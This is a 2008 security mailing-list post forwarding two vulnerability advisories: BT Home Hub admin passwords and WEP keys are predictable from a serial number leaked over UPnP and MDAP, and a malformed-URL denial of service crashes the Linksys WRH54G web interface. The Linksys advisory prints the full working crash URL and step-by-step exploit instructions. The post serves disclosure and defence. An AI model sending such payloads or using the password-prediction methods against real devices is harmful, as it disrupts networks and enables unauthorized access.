[guru] Halozati eszkozok biztonsagi hibai
DATE: Thu, 12 Jun 2008 11:05:53 +0200
Újabb biztonsági hibát találtak a BT Home Hub-ban. Az eszköz default jelszava
valamint a WEP és WPA kulcsa is a sorozatszámán alapul, ezt pedig UPnP
segítségével is könnyen meg lehet szerezni.
DoS hibát találtak a Cisco Linksys WRH54G wlan router-ek http szolgáltatásában.
--- Begin Message ---
UPDATED:
The BT Home Hub's serial number - which is the default admin password
- can also be found on UPnP description XML files. Note that no
password is required to access such files, as they're used for UPnP
(authentication-less) operations. Note: UPnP is enabled by default on
the BT Home Hub.
More information can be found on:
http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub-pt-2/
On Wed, May 21, 2008 at 10:43 PM, Adrian Pastor <ap@gnucitizen.org> wrote:
> http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub/
>
> We're back with more security attacks against the BT Home Hub (most
> popular wireless DSL router in the UK)!
>
> BT added a new security feature on the latest version [1] of the BT
> Home Hub firmware (6.2.6.E at time of writing) which changes the
> default admin password from 'admin' to the serial number of the
> router. From BT Support and Advice [2] site:
>
> "Firmware 6.2.6.E introduces the following improvements: Change
> default Hub Manager access password from 'admin' to your unique Hub
> serial number"
>
> Well, it turns out that you can get the serial number of the Home Hub
> by simply sending a Multi Directory Access Protocol (MDAP) multicast
> request in the network where BT Home Hub is located. Yes, you must
> already be part of the LAN where the Home Hub is present, either via
> ethernet or via Wi-Fi. However, at GNUCITIZEN, we have demonstrated
> [3] trivial ways to predict the WEP encryption key of the Home Hub if
> you know what you are doing.
>
> In summary, there are two ways to break into a BT Home Hub Wi-Fi network:
>
> - arp replays injection plus weak IVs cracking. This attack is
> typically launched using airodump-ng + aireplay-ng + aircrack-ng (I
> highly recommend using Backtrack 2 plus the Alfa USB AWUS036S Wi-Fi
> adaptor for this attack)
> - Predict the Home Hub's default WEP key by bruteforcing a list of
> potential candidates which are derived from the SSID (the SSID can be
> obtained by anyone of course)
>
> As promised in CONFidence [4], we're releasing the full details
> including PoC scripts:
> http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub/
>
> In summary, there are currently about 3 million BT Home Hub routers in
> the UK whose default WEP key AND admin password can be easily
> predicted.
>
>
> ABOUT GNUCITIZEN
>
> GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think
> Tank, which primarily deals with all aspects of the art of hacking.
> Our work has been featured in established magazines and information
> portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and
> many others. The members of the GNUCITIZEN group are well known and
> well established experts in the Information Security, Black Public
> Relations (PR) Industries and Hacker Circles with widely recognized
> experience in the government and corporate sectors and the open source
> community.
>
>
> REFERENCES
>
> [1] "What is the latest version of BT Home Hub firmware?"
> http://snipurl.com/29w9o
>
> [2] "What changes are included in the latest BT Home Hub firmware?"
> http://snipurl.com/29oo4
>
> [3] "Default key algorithm in Thomson and BT Home Hub routers"
> http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/
>
> [4] "Cracking into embedded devices and beyond! - CONFidence, Krakow 2008"
> http://www.gnucitizen.org/projects/confidence-2008/Cracking%20into%20embedded%20devices%20-%20CONFidence%202K8.pdf
>
--
Adrian 'pagvac' Pastor | Security Consultant and White Hat Hacker | GNUCITIZEN
gnucitizen.com
--- End Message ---
--- Begin Message ---
1. DESCRIPTION
There is a DoS vulnerability in Cisco Linksys router WRH54G http service. Any anonymous attacker could crash the http service easily by sending a malformed http request, and needn't any privilege.
When the device attempts to process the malformed request, it will be possible to corrupt sensitive memory. Although unconfirmed, it may also be possible to modify various configuration settings or execute malicious code.
After being attacked, Cisco Linksys router can't be accessed remotely by any user. Http service is not recovered and the attacked router can not be managed without a hard reboot. A reboot of router may cause network disconnected.
Further more, the firewall can still route packets.
2. Affected products and versions
Affected products:
Cisco Linksys WRH54G and other devices
(bacause I have no enough other Linksys routers in hand, I can't make sure how many devices this vulnerability can effect.)
Affected versions:
The lasted Firmware v1.01.03
If Need any privilege:
No
3. ANALYSIS
A malformed http request can cause the http service crashed. The malformed request is mixed by string ./ and overly charactors. Its format is as follows:
Http://192.168.1.1/./front_page......front_page.asp
4. EXPLOIT STEPS
4.1 Make sure the router is running normally, and the Web server is right.
4.2 Open the explorer, type following malformed URL, and press ENTER:
http://192.168.1.106/./front_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_pagefront_page.asp
4.3 Check the http service, it can't work.
Note:
1. The string ./ in malformed request is necessary. Lack of this string, the http server will ask the anonymous to input auth information.
2. the string .asp in the end of malformed request is also necessary. Lack of this string, we can not crash the http server.
3. The firmware information could be found at: http://www-cn.linksys.com/servlet/Satellite?childpagename=CN%2FLayout&packedargs=page%3D2%26cid%3D1140648553423%26c%3DL_Content_C1&pagename=Linksys%2FCommon%2FVisitorWrapper&SubmittedElement=Linksys%2FFormSubmit%2FProductDownloadSearch&sp_prodsku=1172713275887
4. There is another DoS vulnerability about malformed http request in Linksys devices(http://www.securityfocus.com/bid/6301/info).
The description and explit are different from this vulnerability.
--- End Message ---